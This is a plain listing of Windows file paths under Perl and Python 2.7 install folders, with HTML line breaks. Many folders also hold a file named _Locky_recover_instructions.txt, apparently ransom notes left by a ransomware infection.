c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\smmintrin.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\ssp\ssp.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\ssp\_Locky_recover_instructions.txt<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\ssp\stdio.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\ssp\string.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\ssp\unistd.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\stdbool.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\stdfix.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\tgmath.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\tmmintrin.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\unwind.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\varargs.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\wmmintrin.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\x86intrin.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\xmmintrin.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include-fixed\limits.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include-fixed\_Locky_recover_instructions.txt<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include-fixed\syslimits.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\install-tools\gsyslimits.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\install-tools\_Locky_recover_instructions.txt<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\install-tools\include\limits.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\install-tools\include\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\CORE\arpa\inet.h<br />
c:\Perl\perl\lib\CORE\arpa\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\CORE\opcode.h<br />
c:\Perl\perl\lib\CORE\opnames.h<br />
c:\Perl\perl\lib\CORE\overload.h<br />
c:\Perl\perl\lib\CORE\pad.h<br />
c:\Perl\perl\lib\CORE\parser.h<br />
c:\Perl\perl\lib\CORE\patchlevel.h<br />
c:\Perl\perl\lib\CORE\perl.h<br />
c:\Perl\perl\lib\CORE\perlapi.h<br />
c:\Perl\perl\lib\CORE\perlhost.h<br />
c:\Perl\perl\lib\CORE\perlio.h<br />
c:\Perl\perl\lib\CORE\perliol.h<br />
c:\Perl\perl\lib\CORE\perlsdio.h<br />
c:\Perl\perl\lib\CORE\perlsfio.h<br />
c:\Perl\perl\lib\CORE\perlvars.h<br />
c:\Perl\perl\lib\CORE\perly.h<br />
c:\Perl\perl\lib\CORE\pp.h<br />
c:\Perl\perl\lib\CORE\pp_proto.h<br />
c:\Perl\perl\lib\CORE\proto.h<br />
c:\Perl\perl\lib\CORE\reentr.h<br />
c:\Perl\perl\lib\CORE\regcharclass.h<br />
c:\Perl\perl\lib\CORE\regcomp.h<br />
c:\Perl\perl\lib\CORE\regexp.h<br />
c:\Perl\perl\lib\CORE\regnodes.h<br />
c:\Perl\perl\lib\CORE\scope.h<br />
c:\Perl\perl\lib\CORE\sv.h<br />
c:\Perl\perl\lib\CORE\sys\socket.h<br />
c:\Perl\perl\lib\CORE\sys\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\CORE\thread.h<br />
c:\Perl\perl\lib\CORE\time64.h<br />
c:\Perl\perl\lib\CORE\time64_config.h<br />
c:\Perl\perl\lib\CORE\uconfig.h<br />
c:\Perl\perl\lib\CORE\unixish.h<br />
c:\Perl\perl\lib\CORE\utf8.h<br />
c:\Perl\perl\lib\CORE\utfebcdic.h<br />
c:\Perl\perl\lib\CORE\util.h<br />
c:\Perl\perl\lib\CORE\uudmap.h<br />
c:\Perl\perl\lib\CORE\vdir.h<br />
c:\Perl\perl\lib\CORE\vmem.h<br />
c:\Perl\perl\lib\CORE\warnings.h<br />
c:\Perl\perl\lib\CORE\win32.h<br />
c:\Perl\perl\lib\CORE\win32iop-o.h<br />
c:\Perl\perl\lib\CORE\win32iop.h<br />
c:\Perl\perl\lib\CORE\win32thread.h<br />
c:\Perl\perl\lib\CORE\wince.h<br />
c:\Perl\perl\lib\CORE\XSUB.h<br />
c:\Perl\perl\lib\Encode\encode.h<br />
c:\Perl\perl\lib\Encode\_Locky_recover_instructions.txt<br />
c:\Perl\perl\vendor\lib\auto\DBI\dbd_xsh.h<br />
c:\Perl\perl\vendor\lib\auto\DBI\_Locky_recover_instructions.txt<br />
c:\Perl\perl\vendor\lib\auto\DBI\dbipport.h<br />
c:\Perl\perl\vendor\lib\auto\DBI\dbivport.h<br />
c:\Perl\perl\vendor\lib\auto\DBI\DBIXS.h<br />
c:\Perl\perl\vendor\lib\auto\DBI\dbixs_rev.h<br />
c:\Perl\perl\vendor\lib\auto\DBI\dbi_sql.h<br />
c:\Perl\perl\vendor\lib\auto\DBI\Driver_xst.h<br />
c:\Perl\perl\vendor\lib\auto\share\dist\Alien-Tidyp\v1.4.6\include\tidyp\buffio.h<br />
c:\Perl\perl\vendor\lib\auto\share\dist\Alien-Tidyp\v1.4.6\include\tidyp\_Locky_recover_instructions.txt<br />
c:\Perl\perl\vendor\lib\auto\share\dist\Alien-Tidyp\v1.4.6\include\tidyp\platform.h<br />
c:\Perl\perl\vendor\lib\auto\share\dist\Alien-Tidyp\v1.4.6\include\tidyp\tidyp.h<br />
c:\Perl\perl\vendor\lib\auto\share\dist\Alien-Tidyp\v1.4.6\include\tidyp\tidypenum.h<br />
c:\Perl\perl\vendor\lib\auto\share\dist\DBD-SQLite\sqlite3.h<br />
c:\Perl\perl\vendor\lib\auto\share\dist\DBD-SQLite\_Locky_recover_instructions.txt<br />
c:\Perl\perl\vendor\lib\Imager\include\draw.h<br />
c:\Perl\perl\vendor\lib\Imager\include\_Locky_recover_instructions.txt<br />
c:\Perl\perl\vendor\lib\Imager\include\dynaload.h<br />
c:\Perl\perl\vendor\lib\Imager\include\ext.h<br />
c:\Perl\perl\vendor\lib\Imager\include\feat.h<br />
c:\Perl\perl\vendor\lib\Imager\include\imager.h<br />
c:\Perl\perl\vendor\lib\Imager\include\imageri.h<br />
c:\Perl\perl\vendor\lib\Imager\include\imconfig.h<br />
c:\Perl\perl\vendor\lib\Imager\include\imdatatypes.h<br />
c:\Perl\perl\vendor\lib\Imager\include\imerror.h<br />
c:\Perl\perl\vendor\lib\Imager\include\imext.h<br />
c:\Perl\perl\vendor\lib\Imager\include\imextdef.h<br />
c:\Perl\perl\vendor\lib\Imager\include\imextpl.h<br />
c:\Perl\perl\vendor\lib\Imager\include\imextpltypes.h<br />
c:\Perl\perl\vendor\lib\Imager\include\imexttypes.h<br />
c:\Perl\perl\vendor\lib\Imager\include\imio.h<br />
c:\Perl\perl\vendor\lib\Imager\include\immacros.h<br />
c:\Perl\perl\vendor\lib\Imager\include\imperl.h<br />
c:\Perl\perl\vendor\lib\Imager\include\imrender.h<br />
c:\Perl\perl\vendor\lib\Imager\include\iolayer.h<br />
c:\Perl\perl\vendor\lib\Imager\include\iolayert.h<br />
c:\Perl\perl\vendor\lib\Imager\include\log.h<br />
c:\Perl\perl\vendor\lib\Imager\include\plug.h<br />
c:\Perl\perl\vendor\lib\Imager\include\ppport.h<br />
c:\Perl\perl\vendor\lib\Imager\include\regmach.h<br />
c:\Perl\perl\vendor\lib\Imager\include\rendert.h<br />
c:\Perl\perl\vendor\lib\Imager\include\stackmach.h<br />
c:\Python27\include\abstract.h<br />
c:\Python27\include\_Locky_recover_instructions.txt<br />
c:\Python27\include\asdl.h<br />
c:\Python27\include\ast.h<br />
c:\Python27\include\bitset.h<br />
c:\Python27\include\boolobject.h<br />
c:\Python27\include\bufferobject.h<br />
c:\Python27\include\bytearrayobject.h<br />
c:\Python27\include\bytesobject.h<br />
c:\Python27\include\bytes_methods.h<br />
c:\Python27\include\cellobject.h<br />
c:\Python27\include\ceval.h<br />
c:\Python27\include\classobject.h<br />
c:\Python27\include\cobject.h<br />
c:\Python27\include\code.h<br />
c:\Python27\include\codecs.h<br />
c:\Python27\include\compile.h<br />
c:\Python27\include\complexobject.h<br />
c:\Python27\include\cStringIO.h<br />
c:\Python27\include\datetime.h<br />
c:\Python27\include\descrobject.h<br />
c:\Python27\include\dictobject.h<br />
c:\Python27\include\dtoa.h<br />
c:\Python27\include\enumobject.h<br />
c:\Python27\include\errcode.h<br />
c:\Python27\include\eval.h<br />
c:\Python27\include\fileobject.h<br />
c:\Python27\include\floatobject.h<br />
c:\Python27\include\frameobject.h<br />
c:\Python27\include\funcobject.h<br />
c:\Python27\include\genobject.h<br />
c:\Python27\include\graminit.h<br />
c:\Python27\include\grammar.h<br />
c:\Python27\include\import.h<br />
c:\Python27\include\intobject.h<br />
c:\Python27\include\intrcheck.h<br />
c:\Python27\include\iterobject.h<br />
c:\Python27\include\listobject.h<br />
c:\Python27\include\longintrepr.h<br />
c:\Python27\include\longobject.h<br />
c:\Python27\include\marshal.h<br />
c:\Python27\include\memoryobject.h<br />
c:\Python27\include\metagrammar.h<br />
c:\Python27\include\methodobject.h<br />
c:\Python27\include\modsupport.h<br />
c:\Python27\include\moduleobject.h<br />
c:\Python27\include\node.h<br />
c:\Python27\include\object.h<br />
c:\Python27\include\objimpl.h<br />
c:\Python27\include\opcode.h<br />
c:\Python27\include\osdefs.h<br />
c:\Python27\include\parsetok.h<br />
c:\Python27\include\patchlevel.h<br />
c:\Python27\include\pgen.h<br />
c:\Python27\include\pgenheaders.h<br />
c:\Python27\include\pyarena.h<br />
c:\Python27\include\pycapsule.h<br />
c:\Python27\include\pyconfig.h<br />
c:\Python27\include\pyctype.h<br />
c:\Python27\include\pydebug.h<br />
c:\Python27\include\pyerrors.h<br />
c:\Python27\include\pyexpat.h<br />
c:\Python27\include\pyfpe.h<br />
c:\Python27\include\pygetopt.h<br />
c:\Python27\include\pymacconfig.h<br />
c:\Python27\include\pymactoolbox.h<br />
c:\Python27\include\pymath.h<br />
c:\Python27\include\pymem.h<br />
c:\Python27\include\pyport.h<br />
c:\Python27\include\pystate.h<br />
c:\Python27\include\pystrcmp.h<br />
c:\Python27\include\pystrtod.h<br />
c:\Python27\include\Python-ast.h<br />
c:\Python27\include\Python.h<br />
c:\Python27\include\pythonrun.h<br />
c:\Python27\include\pythread.h<br />
c:\Python27\include\py_curses.h<br />
c:\Python27\include\rangeobject.h<br />
c:\Python27\include\setobject.h<br />
c:\Python27\include\sliceobject.h<br />
c:\Python27\include\stringobject.h<br />
c:\Python27\include\structmember.h<br />
c:\Python27\include\structseq.h<br />
c:\Python27\include\symtable.h<br />
c:\Python27\include\sysmodule.h<br />
c:\Python27\include\timefuncs.h<br />
c:\Python27\include\token.h<br />
c:\Python27\include\traceback.h<br />
c:\Python27\include\tupleobject.h<br />
c:\Python27\include\ucnhash.h<br />
c:\Python27\include\unicodeobject.h<br />
c:\Python27\include\warnings.h<br />
c:\Python27\include\weakrefobject.h<br />
c:\Perl\c\i686-w64-mingw32\include\ks.h<br />
c:\Perl\perl\lib\CORE\op.h<br />
c:\Perl\perl\lib\CORE\nostdio.h<br />
c:\Perl\perl\lib\CORE\netdb.h<br />
c:\Perl\perl\lib\CORE\mydtrace.h<br />
c:\Perl\perl\lib\CORE\mg.h<br />
c:\Perl\perl\lib\CORE\malloc_ctl.h<br />
c:\Perl\perl\lib\CORE\keywords.h<br />
c:\Perl\perl\lib\CORE\iperlsys.h<br />
c:\Perl\perl\lib\CORE\intrpvar.h<br />
c:\Python27\tcl\tix8.4.3\pref\Bisque.cs<br />
c:\Python27\tcl\tix8.4.3\pref\_Locky_recover_instructions.txt<br />
c:\Python27\tcl\tix8.4.3\pref\Blue.cs<br />
c:\Python27\tcl\tix8.4.3\pref\Gray.cs<br />
c:\Python27\tcl\tix8.4.3\pref\SGIGray.cs<br />
c:\Python27\tcl\tix8.4.3\pref\TixGray.cs<br />
c:\Python27\tcl\tix8.4.3\pref\TK.cs<br />
c:\Python27\tcl\tix8.4.3\pref\TkWin.cs<br />
c:\Python27\tcl\tix8.4.3\pref\WmDefault.cs<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\ko.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\lt.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\lv.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\mt.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\nb.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\nn.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\nso.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\om.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\pl.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\ro.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\ru.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\se.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\sk.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\sl.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\sq.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\sv.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\tn.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\to.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\tr.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\uk.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\vi.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\wo.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\yo.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\zh.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\zh_big5.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\zh_gb.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\zh_pin.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\zh_strk.pl<br />
c:\Perl\perl\lib\unicore\CombiningClass.pl<br />
c:\Perl\perl\lib\unicore\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\Decomposition.pl<br />
c:\Perl\perl\lib\unicore\Heavy.pl<br />
c:\Perl\perl\lib\unicore\lib\Age\1_1.pl<br />
c:\Perl\perl\lib\unicore\lib\Age\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Age\2_0.pl<br />
c:\Perl\perl\lib\unicore\lib\Age\2_1.pl<br />
c:\Perl\perl\lib\unicore\lib\Age\3_0.pl<br />
c:\Perl\perl\lib\unicore\lib\Age\3_1.pl<br />
c:\Perl\perl\lib\unicore\lib\Age\3_2.pl<br />
c:\Perl\perl\lib\unicore\lib\Age\4_0.pl<br />
c:\Perl\perl\lib\unicore\lib\Age\4_1.pl<br />
c:\Perl\perl\lib\unicore\lib\Age\5_0.pl<br />
c:\Perl\perl\lib\unicore\lib\Age\5_1.pl<br />
c:\Perl\perl\lib\unicore\lib\Age\5_2.pl<br />
c:\Perl\perl\lib\unicore\lib\Age\Unassign.pl<br />
c:\Perl\perl\lib\unicore\lib\AHex\N.pl<br />
c:\Perl\perl\lib\unicore\lib\AHex\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\AHex\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Alpha\N.pl<br />
c:\Perl\perl\lib\unicore\lib\Alpha\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Alpha\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\AL.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Bc\AN.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\B.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\BN.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\CS.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\EN.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\ES.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\ET.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\L.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\LRE.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\LRO.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\NSM.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\ON.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\PDF.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\R.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\RLE.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\RLO.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\S.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\WS.pl<br />
c:\Perl\perl\lib\unicore\lib\BidiC\N.pl<br />
c:\Perl\perl\lib\unicore\lib\BidiC\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\BidiC\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\BidiM\N.pl<br />
c:\Perl\perl\lib\unicore\lib\BidiM\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\BidiM\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\AegeanNu.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Blk\Alphabet.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Ancient2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\AncientG.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\AncientS.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Arabic.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\ArabicP2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\ArabicPr.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\ArabicSu.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Armenian.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Arrows.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\ASCII.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Avestan.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Balinese.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Bamum.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Bengali.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\BlockEle.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Bopomof2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Bopomofo.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\BoxDrawi.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\BrailleP.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Buginese.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Buhid.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Byzantin.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Canadian.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Carian.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Cham.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Cherokee.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\CJKComp2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\CJKComp3.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\CJKComp4.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\CJKCompa.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\CJKRadic.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\CJKStrok.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\CJKSymbo.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\CJKUnif2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\CJKUnif3.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\CJKUnif4.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\CJKUnifi.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Combini2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Combini3.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Combini4.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Combinin.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\CommonIn.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\ControlP.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Coptic.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Counting.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Cuneifo2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Cuneifor.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Currency.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\CypriotS.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Cyrilli2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Cyrilli3.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Cyrilli4.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Cyrillic.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Deseret.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Devanag2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Devanaga.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Dingbats.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\DominoTi.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Egyptian.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Enclose2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Enclose3.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Enclose4.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Enclosed.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Ethiopi2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Ethiopi3.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Ethiopic.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\GeneralP.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Geometri.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Georgia2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Georgian.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Glagolit.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Gothic.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Greek.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\GreekExt.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Gujarati.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Gurmukhi.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Halfwidt.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\HangulCo.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\HangulJ2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\HangulJ3.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\HangulJa.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\HangulSy.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Hanunoo.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Hebrew.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\HighPriv.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\HighSurr.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Hiragana.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Ideograp.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Imperial.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Inscrip2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Inscript.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\IPAExten.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Javanese.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Kaithi.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Kanbun.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\KangxiRa.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Kannada.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Katakan2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Katakana.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\KayahLi.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Kharosht.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Khmer.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\KhmerSym.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Lao.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Latin1.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\LatinEx2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\LatinEx3.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\LatinEx4.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\LatinEx5.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\LatinExt.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Lepcha.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Letterli.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Limbu.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\LinearBI.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\LinearBS.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Lisu.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\LowSurro.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Lycian.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Lydian.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\MahjongT.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Malayala.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Mathema2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Mathemat.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\MeeteiMa.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Miscell2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Miscell3.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Miscell4.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Miscell5.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Miscella.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Modifier.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Mongolia.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\MusicalS.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Myanmar.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\MyanmarE.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\NewTaiLu.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\NKo.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\NoBlock.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\NumberFo.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Ogham.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\OlChiki.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\OldItali.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\OldPersi.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\OldSouth.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\OldTurki.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\OpticalC.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Oriya.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Osmanya.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\PhagsPa.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Phaistos.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Phoenici.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Phoneti2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Phonetic.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\PrivateU.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Rejang.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\RumiNume.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Runic.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Samarita.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Saurasht.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Shavian.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Sinhala.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\SmallFor.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\SpacingM.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Specials.pl<br />
